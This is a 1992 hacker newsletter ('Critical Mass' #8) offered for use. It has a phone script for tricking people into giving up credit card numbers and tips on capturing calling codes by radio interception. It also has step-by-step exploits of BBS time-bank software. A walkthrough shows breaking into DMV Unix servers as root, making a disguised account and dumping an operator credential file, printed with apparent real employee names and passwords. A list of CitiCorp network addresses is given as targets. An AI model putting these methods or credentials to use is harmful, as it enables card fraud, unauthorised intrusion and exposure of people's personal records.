"Ah, the cold air..... Tis the season to be p/hacking...." _____________________________________________________________________________ \~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/ \ Critical Issue # 08 A Technical Text / \ Mass ~~~~~~~~~~~ File Newsletter. / \________________________________|____________________________________/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ __________________________ __________ l___________ | ___________l // \ _______ _____ l|l _____ ______ ___ // /~~~~~~~\_\ l \ l l l|l l l // \ _ l l // / l [] / ~l l~ l|l ~l l~ // /~~~\_\ / \ l l <<<< ritical l / l l l|l l l // / / \ l l \\ \ l < l l l|l l l <<<< / ___ \ l l \\ \_______/~/ l l\ \ l l l|l l l \\ \____/~/ / / \ \ l l_____ \__________/ l__l \_\ l___l l_l l___l \_______/ /_/ \_\ l_______l ==--> ==--> ____ __ ____ ==--> <12/23/92> l \ / l ass ==--> l \ / l __ ______ ______ l \ / l / \ / \ / \ A Technical l l\ \ / /l l / \ / /~~~~~~ / /~~~~~~ text file newsletter l l\\ / l l / ____ \ \ ~~~~~~/ \ ~~~~~~/ ~~~~~~~~~~~~~~~~~~~~ l l \\____/ l l / / \ \ ~~~~/ / ~~~~/ / Issue: 8 l l l l /_/ \_\ /~~~~ / /~~~~ / ~~~~ ~~~~ ~~~~~~ ~~~~~~ _____________________________________________________________________________ l Writters l Special thanks to.... l l__________________________l________________________________________________l l l l l The Beaver l Shadow Hacker, Altos, Section 8, l l Altos l Abigail, D.M., Black Knight, Number Cruncher l l Black Knight l and many other that I forgot l l l to include. l l__________________________l________________________________________________l Critical Mass Technical Newsletter is free to those who wish to gain in further knowledge of topics of Telecommunications, Datacommunications, Computer and Phone Security, Software and other forms of piracy, explosives, and other forms of not widely known or talked about topics. All articles are totally original, unless stated otherwise. We will not except unoriginal, plagiarized articles, or articles that contain false information. We except articles from anyone who is willing to follow these criteria, and as long the editors, writters and S.A.O.O. members feel that the article is worthy to print. We encourage all to download these files and pass them on freely to others as long as credits of the editors, writer or S.A.O.O. is not modified in any way. There is no set date for release issues, but we attempt to put them out as frequently as possible. We now also offer BBS's outside the Tallahassee area to get on our BBS listing. If you decide to get on this list, we will send you issues as soon as they are produced. We also now sponser a total legit network called, "UnRegNet". The converstions included general hacking, basic and advanced hacking, hacking Unix, hacking VMS, pyro , anarchy , pirate, and much more... Come and check it out......... If you wish to become a part of UnRegNet, please leave mail on UnRegNet in the HGENERAL to either The Beaver or Black Knight at one of the following UnRegNet BBS's..... Tower Of Power <904>668-6745 The Speed Shop <904>PRI-VATE - Mail The Beaver for the number. Silicon Nightmare <904>PRI-VATE If you have any questions pertaining to a article, please leave E-Mail to the author of the article. If you cannot get in contact with the author, please leave "The Beaver" mail at the one of the BBS's above and he will try to put you in touch with the author, and/or try to answer your questions. SAOO Support Boards The Speed Shop <904>PRI-VATE Silicon NightMare <904>PRI-VATE To gain access to one of the following BBS's, please contact the sysop of the board or a member of the SAOO. If you wish to become a member of the S.A.O.O. please leave The Beaver E-Mail, where he will send you an application for you to fill out. From there, local S.A.O.O. members in your area will consider you and take a vote on if at that date you can become a member. We are always looking for experienced and even non-experienced p/hackers to join. Only after a back-ground check and the vote, will you be let in. If you fail to get in, do not be mad, we have turned down many people. Simply wait, improve the reasons that you where not let in, if possible, and in the mean time, learn. We are also looking into other remote S.A.O.O. support boards to net with and share information with. In the event that you would like to support a S.A.O.O. chapter in your area, please contact a member of the Tallahassee S.A.O.O. Benefits do come. Head Chief And Writer - The Beaver Editor - Altos Members - ilicon luminum xidation rganization. If you wish to become a distribution point for Critical Mass, please E-Mail the Beaver, and I will add you to the list. You will get your copy of Critical Mass as soon as they are produced. This Issues Articles Include: I. - Editorial By The Beaver II. - How To Bust Into Systems By Black Knight III. - Hacking Florida DMV By The Beaver IV. - Basic Telenet By Altos V. - CitiCorp/CitiBanks Telenet NUA's By The Beaver and Altos VI. - SAOO Telenet Scan By The Beaver VII. - Basic Anarchy For The Youngsters. By Penial Implant VIII. - Finnal Notes ________________________ Editorial By The Beaver ________________ Yes, Yes, Yes.... Welcome one, welcome all to yet another Critical Mass.... What do you say that we stop and take a look around us for a moment.......... God... It seems that we have come upon yet another Xmas. We all knows what this means... More public mail like "HI, MY NAME IS TIM. tHIS iS MY FIRST TIME ON A bBS!". Which will lead to, "wheres the k-k00l killer kean warez!"... Ahh, well.. we all have to start somewhere. To thoughs whom do not know, UnRegNet IS underway! Yes, thats right Tallahassees first echo on the topics of P/Hacking, Piracy, Explosives, drugs, and just general all American chaos is discussed. I want to get a little something straight here, before some people start posting "killer k0dez" and stuff on the echo.... The echo is legit... Yes, it is total legal, which basicly means that you cannot post information that is of a illegal nature......... However, since we do live in a country where we can all yell at any given point in time, "I plead the 5th", and along with the great tradition of, "Its information, thats all.... You have heard of the first amendment you S.S. commie swine you?", you can discuss the method of general hacking...... We also invite other people to get involved in the echo, such as Computer Security Specialist, and people whom are against p/hacking in general.... We love to hear the imorals of hacking. If you even got a gripe about the whole thing, please do tell... Let me state again, however, that this is a legal net, and not a flame echo... Keep it within reason...... If you do have a gripe, please leave it in the Anti-Hacker area only... In other local news, the local community has lost some great BBS's in our local area. One of which was Section 8's old BBS along with the viral collector king, Dr. Strangelove. I found this out the other day.... Seems that ole Centel is trying to pull a fast one on there ANI dialups. DM and I embarked on a 3 digit scan to find Centel's new ANI's. Low and behold, after scanning over 700 numbers, they move the damn ANI to a 4 digit exchange! Welp, considering that there is no need for you to do the work , here it is.... Dial 7118. What is ANI you ask? Well, I will let you dial it and decide... Basicly, this will tell you any fone number that you are dialing from.... Heres some other information that was not enough to make it to actual articles. Actually, some of them I heard/read about, but I will share with you anyway. Fact: FDLE's database is ONLY 2 gig! Every want a credit card number , but just just could not find the means? Welp, here is what you do. Pull the following social engineer........ First go to a fortress/loop/whatever! Mark - "Hello." You - "Yes, This is Dave at CitiBank Security. We have seem to have had a computer break-down and there is a problem with your VISA and you will not be able to make anymore trans- actions until it is re-entered. Can you give me you VISA number?" Mark - "Ahhhh, I don't know, this sounds a little fishy, buddy. I got a idea, how about I call you...." You - "I understand that you are reluctant. Here you go, this is my office number. " Mark - "Okay, bye." You - "Goodbye." RING! You - "Citibank Security, This is Dave, how may I help you?" Mark - "Ahh, okay.... I thought this might be a scam or something. Anyrate, my VISA number is blah, blah, blah....." Easy as that. I don't know about you, but if you want LD codes/extenders, VMB passcodes, etc, there is one really neat way to do it. I was reading a few days ago in Phrack, or maybe it was Phun. Anyrate, They had a article on using scanners to intercept fone conversation, along with other freq's, such as bugs, FBI, etc, etc. Now, lets say you hooked up a tape recorder to you scanner via the earfone jack and recorded stuff. Lets say, you drop into Airline fones. You are gonna get codes! The same with cellular and maybe even portable fones. I know what I want for Xmas! Centel looks like it will be finally bought out by US Sprint! Centel has been quoted as saying that they would not upgrade Leon County telefone equipment until they where sure that US Sprint was indeed going to buy them out. This explains alot of the trouble with our local telefone system here. Speaking of trouble, in the 385 trunk, some of you that are in it may experience trouble in that your calls will seem to be "diverted" or get other peoples conversations. I called Centel and talked to a tech there, this is what he has to say..... "Yeah, on the 385 trunk, in some areas, when it get moist out the lines cross over, thus shorting out." "When will it be fixed?" "Thats hard to say, seems that it is a tough problem to fix. Tall- ahassee only has on prefix in town that has fiber optics. There is really no telling." I believe the prefix he was refering to was the 942, though I am not sure at this time. According to Tallahassee local news, DMV is changing its format used on there local computer systems. It seems that more people will have access to your driving records. The new system will give information pretaining to tickets, DUI, expired tags, etc, etc. The majority of the users look like they will be people like Budge Rent'a Car, and other car rentals. The system will also work alot easier than it currently does. All one must know is the Name. Currently , one needs a alot of information such as VIN's, Tag numbers, specific dates, etc. What this will allow the curious hacker is a more than easy way to find out the same information. Strange NUA: If you can, connect to the following NUA from your local Telenet/ Whatever dialup........... 224206 < its in the 3110 Telenet DNIC > This will give you a list of Hong-Kong flight schedules. Just fun to show you friends! ___________________________________ How To Bust Into Systems (Time Bank Systems, That Is!) By Black Knight (Of Course!) ____________________________ I'd first like to let everyone know that I did not find all of these by myself. I was given how to do two of these by other people, but I'm just showing them so that you can do them yourself; I am NOT taking credit for them. Anyway, here they are: 1) How To Get Extra Time With Searchlight With one of the older versions of Searchlight, it came with a time bank that was EXTREMELY faulty. The only things you could do was withdraw, deposit, and quit. Unfortunatly, since most people don't use Searchlight and don't have that old version, this will usually not work. But, it's worth a shot. What you need to start out with is to use all but three minutes of your on-line time. Then go to the Time Bank. In there, you will want to deposit your time. It will say how much time you have available to deposit and ask you how much you wish to deposit. You will want to deposit as much time as it says you can, probably about two or three minutes. So type in "2" or "3". BUT, don't press enter. You know have to wait. How long? Well, how about two or three minutes? After you think you're time would've run out, press enter. It will exit you back to the main menu of the Time Bank and say you have about 16000 minutes left. Good job! This Time Bank scam works on the fact the the Searchlight Time Bank works on a cycle theory. When you're waiting for the two or three minutes, the time bank is still clicking it's time away. So after waiting, your time remaining is actually zero or less. So after depositing two or three minutes, which you don't have, you will definitly have a negative value for your time remaining. This is where the cycle comes in. The Time Bank essentially "thinks" that you have negative time. and since that is obviously impossible, it just wraps your time around to the maximum value. Although this is a great trick, you are only allowed to deposit 2000 minutes or so. Oh well! 2) How To Get Extra Time With HamBank This is a proven trick you can pull with HamBank version 1.2. This is extremely easy to do and takes virtually no effort. A user of mine suddenly had 500 minutes remaining one day. I said "How in the HELL did you do that?". Of course, he wouldn't say, so I watched him and eventually figured out the trick. Of course, I drop his time down to nothing after he does it, but it's worth a shot, isn't it? You first need to find a board that uses HamBank; usually an RA, QBBS or XBBS. As soon as you log on, feel free to go right to the Time Bank. If you already have some time in there, withdraw all of it. Then exit back to the BBS. Now go back to the Time Bank. Now you'll have around 100 minutes or so... doesn't really matter, but the more the better. Either way, once in the Time Bank the second time, deposit all but five minutes of your time. It will say something like "Do you wish to deposit this amount? (y/N)". Of course, you press "Y" and then hit enter. As soon as you hit enter, drop carrier. Then call the BBS back. You will have the same amount of time that you had when you return from the time bank after withdrawing all you time, about 100 minutes or so. This works on the fact that HamBank is stupid. Really! After you deposit your time, HamBank ASSUMES that you've done nothing while in the program. So of course, it reports back to RA, QBBS, whatever that you've done nothing and to maintain the same amount of time as when you shelled out. BUT, HamBank was even more stupid because it saved your HamBank banking account before you hung up. Therefore, you have your 100 minutes or so in both RA AND HamBank. But as I suggest that after doing this, you do not log right back on. Wait an hour or two and then log on so that the SysOp doesn't notice anything. Give this a shot, it works great! 3) How To Get Extra Time With Remote Access Timebank Service This is another scam, but I figured this one out on my own. This is a lot like the Hambank scam, but goes the opposite direction. Although most boards these days don't use Remote Access Timebank Service (hereon mentioned by RATS), this is still a good thing to do. First you need to find a board that carries this Time Bank (usually an RA board ). Anyway, once on, you need to start with about 30 minutes or so. Enter the bank and deposit around 30 minutes. Now, exit back to RA. After returning to RA, go BACK to RATS. Now, this time withdraw your deposited time. After it "says" that it saved your account, hang up. Call back the board. RA says that you have all your time back again. Enter RATS and you'll see that all your time is still in there. All you need to do is keep calling back the board, withdrawing time, and hanging up. Lot's oh phun. This works by two facts. First, RATS is old as a mother-fucker. Second, RATS is more stupid than HamBank. When you deposit your 30 minutes into it, it is just saving your account in EXITINFO.BBS, not the actual RATS account. But when you exit back to RA, that's when it saves. And when you withdraw your time, all it's doing is editing the EXITINFO.BBS and when you hang up, it assumes you've done nothing and it goes ahead and exits without saving your account. But of course, when RA sees that you have some extra time, it will save your account and then hang up. Try all of these out, they are great phun. In the meanwhile, I'll be writing my own Time Bank . Really though, if you figure out how to bust another Time Bank, please let me know. You can contact me on my board, The Tower of Power, via (9o4) 668-6745, FidoNet 1:36o5/256, or UnRegNet 222:13oo/4. laTeR... - Black Knight - Member of UnRegNet - Sysop Of Tower Of Power <904>668-6745 _____________________________ Hacking DMV By The Beaver _________________ This articles focus is on DMV , and the security around there machines..... It is fairly straight forward, and though I cannot say that all DMV machines are the same, most servers probably are...... The machines discussed here are in the local area. -------------------------------------------------------------- Ok, first off, you will want to find a DMV server, correct? Well, As much as I would like to, I cannot give the number, because everone would hack'em and that would be a major hassle, plus the fact that someone would get busted.... However I will tell you that one machine is located in the upper 487 prefix. . The rest is up to you. DMV servers run under Unix, and it is unreal how easy to defeat there security is.... It is simply a matter of knowing what username to type in. On the DMV servers I have played with, there is NO passwords on ANY of the accounts... This includes root, sysadmin, who, uucp... You name it! Now, upon calling a DMV machine, here what should happen.. When you call it, you will have to wait a minute for the login prompt... Which should be look something to this...... Northwoo 2400 login: At which point, the first thing to do is login as root. Since DMV machines hold no password, you should become superuser quite easily. After that, do a "who" , you will probaly see some non-interactive accounts on..... For saftey reasons, do not login during working hours! I prefer sometime at night.... Ok, after you look around a bit and see that you are getting nowhere, go ahead and "cat" and capture the passwd file... This will be in the etc directory... For example, here is what you would do.... $ cd /etc $ cat passwd This will dump all the usernames on the system and along with there encrypted password .... Don't worry about the encrypted passwords, because as I said, they don't use passwords at DMV! Here something what you should get..... root:x:0:3:0000-Admin(0000):/: sa:x:0:0:SA Menus Login:/sa:/sa/sa.exec sarem:x:0:0:SA Menus Remote Execution:/sa:/bin/sh startup:x:0:0: Start Multi-User Mode:/:/etc/startup shutdown:x:0:0: Multi-Single-Halt Mode:/:/etc/shutdown reboot:x:0:0: System Reboot :/:/etc/reboot halt:x:0:0: System Halt :/:/etc/halt daemon:x:1:1:0000-Admin(0000):/: bin:x:2:2:0000-Admin(0000):/bin: sys:x:3:3:0000-Admin(0000):/usr/src: adm:x:4:4:0000-Admin(0000):/usr/adm: uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp: nuucp:x:10:10:0000-uucp(0000):/usr/spool/uucppublic:/usr/lib/uucp/uucico sync:x:20:1:0000-Admin(0000):/:/bin/sync who:x:21:1:0000 Admin(0000):/:/bin/who diag:x:22:1:User Diagnostic Tests:/tst:/bin/sh lp:x:71:2:0000-lp(0000):/usr/spool/lp: listen:x:81:4:0000-listen(0000):/: setup:x:0:0:general system administration:/usr/admin:/bin/rsh sysadm:x:0:0:general system administration:/usr/admin:/bin/rsh checkfsys:x:0:0:check file system:/usr/admin:/bin/rsh makefsys:x:0:0:make file system:/usr/admin:/bin/rsh mountfsys:x:0:0:mount file system:/usr/admin:/bin/rsh umountfsys:x:0:0:unmount file system:/usr/admin:/bin/rsh frvis:x:201:201:frvis:/FRVIS:/bin/sh help:x:0:0:frvis-help:/FRVIS:/FRVIS/help sta0:x:100:201:Station Number 0:/FRVIS/OBJ:/FRVIS/OBJ/go sta1:x:101:201:Station Number 1:/FRVIS/OBJ:/FRVIS/OBJ/go sta2:x:102:201:Station Number 2:/FRVIS/OBJ:/FRVIS/OBJ/go sta3:x:103:201:Station Number 3:/FRVIS/OBJ:/FRVIS/OBJ/go sta4:x:104:201:Station Number 4:/FRVIS/OBJ:/FRVIS/OBJ/go sta5:x:105:201:Station Number 5:/FRVIS/OBJ:/FRVIS/OBJ/go sta6:x:106:201:Station Number 6:/FRVIS/OBJ:/FRVIS/OBJ/go sta7:x:107:201:Station Number 7:/FRVIS/OBJ:/FRVIS/OBJ/go sta8:x:108:201:Station Number 8:/FRVIS/OBJ:/FRVIS/OBJ/go sta9:x:109:201:Station Number 9:/FRVIS/OBJ:/FRVIS/OBJ/go sta10:x:110:201:Station Number 10:/FRVIS/OBJ:/FRVIS/OBJ/go sta11:x:111:201:Station Number 11:/FRVIS/OBJ:/FRVIS/OBJ/go sta12:x:112:201:Station Number 12:/FRVIS/OBJ:/FRVIS/OBJ/go sta13:x:113:201:Station Number 13:/FRVIS/OBJ:/FRVIS/OBJ/go sta14:x:114:201:Station Number 34:/FRVIS/OBH:/FRVIS/OBJ/go Actually for the articles sake, this is a bit edited so that it is not as long..... Now, lets take one of these guys and examine it.... sarem:x:0:0:SA Menus Remote Execution:/sa:/bin/sh ^ ^ ^ ^ Username Password Brief Discrition Shell Now, look at the Shell field.... There are several types of shells, such as sh , csh, and ksh . What does this mean? Shell are nothing more than work areas. That is, if you are one of those three shells, you can work at a Unix based level, meaning you are actually dealing with the operating system itself, similar to when you login under the root account.... You are working with Unix itself. Now lets look at another...... sta10:x:110:201:Station Number 10:/FRVIS/OBJ:/FRVIS/OBJ/go ^ ^ ^ ^ Username Password Brief Discription Whats This!?!? Hmmmm, look at where are shell should be.. there is no sh, csh or ksh shell but rather "go" in the "/FRIVIS/OBJ" directory?!? Actually it is rather simple... It is a program that is executed at login, and this account has NO shell access. Look at it this way, at DMV they had a choice to make everyone learn Unix or create a simple menu system so that any idiot could us it . Before we go executing this menu system, would it not be nice to look like everyone else that logs in other than standing out as the root superuser? Heres what you do.... Logout and call back, this time login under "sysadm", with, of course, no password. Just follow instructions and make a new account, and call it sta50 or something like that, so you won't stand out. Make it just like the other sta accounts , BUT when it talks about a shell, tell it you want a "/bin/sh" shell, or what ever you desire. Once you have made your new account, quit and login under "sta50" with no password, and boom, you fit right in, if someone looks at ya! But wait, with a "sh" shell you are no longer superuser right? Wrong. If you hit any files that are out of your access to touch, type "su" , and of course, you will not be prompted for a password. Ok, thats out of the way.... You fit right in... Now, lets go back to this "go" thingy that we were discussing above. Remember that the program was in the FRIVIS/OBJ directory, so simply type..... # cd /FRVIS/OBJ ^ Note: I am SuperUser The cap's DOES matter.... When you see something in cap's, type it that way! Ok, now we are in this directory where the program "go" is.... We are a bit curious to see what this "go" thang does.. So type....... # exec go Here is what you should get..... M61L10- --------------------- LOG ON -------------------- CLERK: ENTER OPERATOR NAME (__________) ENTER YOUR ALLOWED_FUNCTIONS ( ) 1. TITLE ONLY 2. REGIS ONLY 3. REGIS/TITLE 4. CASHIER ONLY 5. TITLE/CASHIER 6. REGIS/CASHIER 7. REGIS/CASHIER/TITLE NOTE: ENTER OPERATOR NAME AND ALLOWED FUNCTIONS AND PRESS RETURN. IF CORRECT, YOU WILL BE PROMPTED FOR YOUR PASSWORD. Oh, great! We have to login AGAIN! Never fear! Remember, we are SUPERUSERS! So get out of this crap and re-login under your fake account... Now, considering that the above is actually a program that is asking for a password, we know that the program must store the Usernames/Access levels/Passwords in a file. So re-login, at go to the following directory like this.... # cd /FRVIS/DATA In this directory, you can get a file called OPERATER, that contains all the accounts that the people at DMV use...Once in this directory, type...... # cat OPERATOR Now, cat the file called "OPERATOR", it should look like this.. 00000100NAME00 PASS00070000 00000101DIEFENDORF050967030000 00000102THOMAS 090265030000 00000103MOODY M 011538070000 00000104NAME04 PASS04030000 00000105NAME05 PASS05030000 00000106JACKSON C 050543030000 00000107HASLE BO 041449030000 00000108SHOUPE PAM081262030000 00000109CHAMBERS 042637070000 00000110RABONR 111152070000 00000111FRIERSON 031944070000 00000112MEDLEY D 021659030000 00000113MERRITT L 042159070000 00000114REED T 082160030000 00000115HILTON J ADASST070000 00000116MIDDLETOND041033040000 00000117CARPENTER 030868030000 00000118HENDERSONA123058030000 00000119FABIAN P 040538030000 00000120JACKSON A 061164030000 00000121HODGES S 092957070000 00000122CONE V 092731070000 00000123WILLIAMS R082757070000 00000124DRINKWATER112957030000 00000125STRUMSKI V043036030000 00000126KITTRELL 013063030000 00000127WILLIAMS S073170030000 00000128SHARPE B 051451070000 00000129FOUNTAIN 062834070000 00000130NAME01 PASS1 070000 00000131NAME1 PASS1 070000 00000132JORDAN MAGGOT070000 00000133CLERK20 AUTOAP060000 00000134CLERK27 AUTONM060000 00000135NAME35 PASS35070000 00000136NAME36 PASS36070000 00000137NAME37 PASS37070000 00000138NAME38 PASS38070000 00000139NAME39 PASS39070000 00000140NAME40 PASS40070000 00000199MAGGOT-1 MAGGOT070000 00000151UNISYS UNISYS070000 Now, to decipher this crap... Lets look at one..... 00000199MAGGOT-1 MAGGOT070000 ^ ^ ^ Username Passwd Access Level Ok, their username is Maggot-1, their password is Maggot and their access level is 7000. Let me explain a little more about how you came to this.... Go to the beginning of the string, now count 8 places out... You will land on the M... From here you can see how I got maggot-1. Now, move to the second maggot, and go up to the first 0 you hit. Now anything past the zero is the level... The lower the better..... Use levels 3000 preferably. Here, let look at another...... 00000135NAME35 PASS35070000 ^ ^ ^ User Passwd Level So the username is....... NAME35, Password35 at level 7000 . Now we can use DMV as it is supposed to be used. So go back to the directory FRVIS/OBJ and execute go. Now when it asks you for a operator name and password, you will know exactly what to do! Before I leave you off hack'in DMV, let me state that DMV is NOT in anyway fun to use. You must supply VIN's, Registration dates, and it just a pain in the ass... The advanages are that you can find out where people live, fone numbers , driving records, tag numbers, police cars tag numbers....... Alot of shit! Chow! ---====--- Moderator Hack! UnRegNet Moderator Hacker! UnRegNet Moderator VAX/VMS UnRegNet Member SAOO ================================== -+| Hacking the Telenet Network |+- ================================== = Constructed by, = = Altos = +========+========+ ============================|========|========|=================================== Some things to do while online with Telenet and Tymnet. While at the @ on the Telenet system type "mail" or "C mail" or "telemail" or even "c telemail" this access's telenets mail system simple entitled "Telemail" from there it will ask "user name" or something like that type "phones" next it will prompt you "password" enter "phones". The phones service has alot of worthy information it will give you a menu to choose from the rest should be self explanatory. Along with the other information on the phones service there is a complete updated list of all Telenet access numbers which is conveinent. Once you have tried the phones service also on telemail enter "Intl/Associates" as the user name and "Intl" for the international access numbers. If you are calling from overseas somewhere connect with an telenet access number then type this Nua at the telenet @ prompt "311020200142" and enter the username and password. You might want to pick up a sort of a reference booklet on Telenet simply again call the customer service number and ask them for "How to use Telenet's Asychronus Dial Service" and give them your address which is self explanatory. Another tidbit of info you would like to know if you already didnt know that Telenet is owned by Us Sprint long distance service. another way to obtain access to this network from your home or apartment even a phone booth, you first need to know a number to connect to. The international number is as follows: 1-800-424-9494, And the local access number for telenet is 561-8830 E71 You need to have your modem settings at E71 and your terminal at VT100, after you connect you will see 'TERMINAL=' at this prompt you need to enter a '@' and then press enter, you should then get a '@' at this prompt enter your telenet address let's say we tried '655321' EX: @ 655321 blah blah blah CONNECTED! Virgin Island Coast Guard Login> hack it! Password> hack it! After you have tried unsucessfully a few times, it will proceed to bump you off so do not be alarmed by it, disconnection will (should) occur after the incorrect password, not during entering a user or such after you get booted it will send you back to the telenet prompt '@' where you can again enter another address. The first thing your going to have to have is your Access number it is very easy to get your local access number. Simply call telenet at 1-800-TELENET that is thier customer service number and ask for your dialup the operator will ask for your area code and prefix of your phone number he/she will also ask your baud rate. There are many telenet ports across the country and internationly with varying baud rates from 110 bps (yuck) to 9600 (i wish i had) so you will want your maximum baud port most locations have atleast 1200 many have 2400 and not alot have 9600 ports like for big cities like Detroit and Los Angeles at the end of the file i will list some useful numbers. I. HOW TO USE THIS NETWORK How to use this network was explain in short detail above, however ther is more to the explainations on how to use this network, if you try to enter just shit at the telent prompt '@' it will not recognize it, it will come up with a '?' write under your telenet prompt, all the prompt will except is address. Also not explained already is the format of address, all address are not in the format of xxxxxx (6 digits) you can have address like 123456.7, and so on, This is a clever little way to find a back door to a system, let's give another example. EX: 123456 REJECTING CONNECTIONS, TRY BACK LATER Well yeah, it's true telenet address 123456 is rejecting, but possibly 123456.5 isn't, and that is your way into a system however, this doesn't always work. So you may end up logging off and trying back later. Error messages are always going to be learking around just waiting to get in the way of your hack so I put together a few to watch for, and a brief explanation to them in topic III II. - TELENET TERMS Not Available Not Operating Not Responding - Your net feed can't accept your request, and try it back later. Not Connected - You have entered a telenet command thats is only able to be used while in a connection type 'cont' to get back in a connection. Not Reachable - A temporary probelm or condition keeps you from using the network. Password - This is the prompt which appears after you have entered an NUI (Network User Idenifaction). Invalid User ID or Password - The NUI you used is not valid. ***Possible Data Loss*** - connection as been reset. Refused Collect Connection - You must prepay for your connection. Local Congestion - Your local Access number is busy. Try Again later. Local Network Outage - A temporary problem is preventing you from using the network. Rejecting - Host computer system refuses to accecpt callers. Local Disconnect - Your terminal has been disconnected. Remote Procedure Error - Communication problem forced the network to clear the network Still Connected - You tried to access another address while still on-line with another. Telenet XXX XXX - Network Port you are logged in on. Terminal - This is the terminal type prompt (VT100, ANSI, VT52, ETC.) Unable to validate call - Your NUI has been temporarily disabled. Unable to validate call contact admin - The NUI has been permently disabled! Unknown adress - Your chosen NUA (Network User Adress) may be invalid. WATS Call not permitted - Telenet In-wats calls are not permitted by your host or your NUI. Access to this adress not permited - Your NUI is not authorized to connect to this adress. (NASA, CIA, FBI, BANKS, ETC) Here is some little tid's n' bit's of shit that could help alond the way: Telenet Costumer Services 1-800-TELENET Tymnet Customer Services 1-800-872-7654 Local Access Number 561-8830 2400bps. III. - SCANNING THE TELENET NETWORK There are hundreds, hell even thousands and thousands of address, some to bank systems, some to airport scheduling, and even NASA, ranging from 333 to a address like 9999999, so if you are a real serious telenet'r you should get some software made to scan telenet. There is a program currently out in the Local area here called TSCAN*.*, put out by 'The Beaver', a member of the SAOO, you can get access to this software on a few boards, it may require asking around. After you get the software you need to configure it to your standards, then begin scanning adresses, TSCAN is fairly easy to use and will auto log the address scanned and the systems found on telenet, This is by far the best scanner you can get currently IIII. - LIST OF A FEW NATIONAL TELENET ADRESSES (CITICORP) <"1000's" Scan"> ______________________________________________ CitiCorp And CitiBank Around The World By The Beaver ______________________________________ A while back, I was scanning around on telenet to find something to work on... This was during my "thousand" scan, and while scanning I hit a CitiCorp machine. After a little bit of research, I found a pattern to there machines, and was able to find CitiCorp cash management machines, banks all over the world and mail systems around the world...The following are reachable though Telenet. If you have no idea about Telenet, please read CM#6 and CM#7 for more information. 224XX Information --------------------------------------------------------------------------- 22400 - Citi Cash Management New York/Delaware Checking Region, Checking Manager, Cash Pathway region, Paperless Entry Process System, Message Network Information System, CICS, Billing Information, Global Clearing System/CICS region, "host40" Time sharing option, Internation Disbursemen region, Global Clearing System CPCS Region, Total Report Management. 22401 - Same As Above 22402 - Global Report - VAX/VMS 22403 - Global Rebort from CitiCorp 22404 - Prime/Primos "PROD-A" 22405 - DECServer. Bit hard to get on, so try "?" and/or a few things 22406 - CitiBank Canada - VTAM Server that is accessable to New York, Delaware and COSMOS II in Canada 22409 - Global Report from CitiCorp 22410 - CitiBank Network Of Brasil 22411 - "*** WELCOME TO C/C/M ***". Unknown, probably CitiCorp 22412 - Prime/Primos 22413 - "*** WELCOME TO C/C/M *** INT'L 3 ***" 22414 - "*** WELCOME TO C/C/M *** INT'L 3 ***" 22416 - CitiBank Frankfurt - Networking VBS *22417 - Routes though a DECServer. Autologs to a VAX/VMS, however, you can hit control-z or wait for it to timeout and it will drop you to "local" mode at the DECServer! *22420 - CitiCorp DECServer, with lots of services! Mostly in the London Area, as far as I can tell. 22421 - Unknown 22422 - Unknown 22423 - CitiBank N.A. Bahrain 22424 - "Your call has been diverted for network user validation" - Unknown 22426 - Unknown 22427 - CitiBank Of Johannesburg *22428 - VCP Server . Lots of CitiCorp Machines, plus lots of users online! 22430 - CitiBank Of Piraeus 22431 - ADAM_COSMOS. Prime running PrimOS 22432 - CitiBank, But unknown due to it locks... Location Unknown 22433 - Same as 22432 22434 - CitiBank Of London 22435 - DUBLIN_COSMOS. Same as ADAM_COSMOS. Prime running, but of course , PrimOS 22436 - CitiBank Regional System In Singapore 22438 - CitiBank Of London 22439 - CitiBank of Milan 22440 - CitiBank Of Athens - HERMES System 22441 - CitiCorp/CitiBank 22442 - CitiBank, Location Unknown.. System locked 22443 - CitiBank Of Vienna COSMOS, Prime Computer running PrimOS 22444 - CitiBank Of Lewisham 22445 - Prime/Primos "NORDIC", Copenhage 22446 - Prime/Primos "NORDIC", Helsinki 22447 - "Enter Secure Access ID". 22448 - "CONNECTED TO 03 35-50" - Prime running PrimOS 22449 - CitiBank Of Frankfurt 22450 - CitiCorp/Citibank MainFrame.. Location Unknown 22451 - CitiCorp Cash Management Service Server 22452 - CitiBank Of Latino, Mexico - Network Access 22453 - JERSEY_COSMOS, CitiBank.. Prime running PrimOS 22455 - CitiBank Of Brasil *22456 - "GFNA Mid-Range Data Center", server. Whats nice about this place is, yes, it serves more CitiCorp systems, but though the server itself , you can get to DECServers 22457 - VAX/VMS 22458 - CitiBank Of Venezuela 22459 - Unknown, Asks for terminal Emulation then goes goofy 22460 - CitiBank Of Kuala Lumpur 22461 - CitiBank Of Sidney, Australia 22462 - CitiCorp Of Singapore 22463 - CitiBank Of Manila 22464 - Prime Running PrimOS 22465 - CitiBank Of Singapore *22468 - VCP DECServer Ripoff. 22469 - CitiBank Of Singapore 22471 - CitiCash Manager *22473 - VCP Server, with tons of CitiCorp Machines! 22474 - CitiCash VTAM Server 22475 - Unknown, Locks up 22476 - Unknown, Gives Garbage 22477 - Unknown, Locks Up 22478 - CitiBank Of Hong Kong 22479 - CitiCorp Cash Management Service Server, In Silver Springs, MD 22480 - Unknown, Locks up 22481 - Unknown CitiBank.. Locks at present time... 22482 - Prime running PrimOS 22483 - Some Weird Emulation Server 22484 - CitiBank Of Hong Kong 22485 - CitiBank Of Hong Kong 22486 - Prime Running PrimOS *22487 - Yet Another DECServer, with tons of CitiCorp Machines 22489 - Prime Under PrimOS 22491 - Prime Under PrimeOS 22493 - Says, "HOLA" just as it disconnects 22495 - "BMS==>", Unknown 22497 - CitiBank Of Hong Kong 22498 - N.Y. Citicorp Cash Management, "*** WELCOME C/C/M *** INT'L 4" 224100 - CitiSwitch , New York 224104 - "BMS==>" , Unknown 224105 - "TYPE ." , Unknown 224108 - "*** WELCOME TO C/C/M *** INT'L 6 ***" 224125 - "PLEASE ENTER TRANSACTION ID:" 224128 - Prime (LATPRI), PrimOS 224132 - Primt (PROD-B), PrimOS 224139 - VAX/VMS 224140 - VAX/VMS 224141 - ":", Unknown 224142 - WELCOME TO C/C/M, Citicorp Cash Management. N.Y. 224143 - Citi Cash Management 224145 - Unknown, Locked at time of scan 224147 - WELCOME TO C/C/M 224148 - CitiBank Of London *224150 - DEC Gateway 224152 - Corporate Audit BBS 224153 - Citi Cash Management 